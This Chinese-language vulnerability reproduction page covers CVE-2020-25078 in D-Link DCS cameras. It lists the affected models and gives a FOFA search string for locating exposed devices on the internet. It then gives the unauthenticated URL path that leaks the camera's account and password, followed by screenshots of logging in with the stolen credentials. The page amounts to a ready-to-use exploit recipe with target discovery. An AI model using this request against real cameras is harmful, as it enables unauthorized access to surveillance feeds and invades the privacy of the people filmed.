# D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

D-Link DCS系列监控 通过访问特定的URL得到账号密码信息，攻击者通过漏洞进入后台可以获取视频监控页面

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

app="D\_Link-DCS-2530L"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

访问登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1YSbLSZT9XBYJVUI%2Fimage.png?alt=media\&token=08fd4da5-d1e8-43e3-8d93-7f6ee37b9e41)

出现漏洞的 Url 为, 其中泄露了账号密码

```
http://xxx.xxx.xxx.xxx/config/getuser?index=0
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1b0WQLoQzgXHLEEX%2Fimage.png?alt=media\&token=810f4ad4-91d1-4921-99e8-94d7c6571dce)

使用泄露的账号密码登陆系统

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhr0DFdH66XtvxzCIRl%2F-Mhr1e9fQUWVtAF6hBid%2Fimage.png?alt=media\&token=901ddabe-4520-44bf-ba8f-e43ec996c6f7)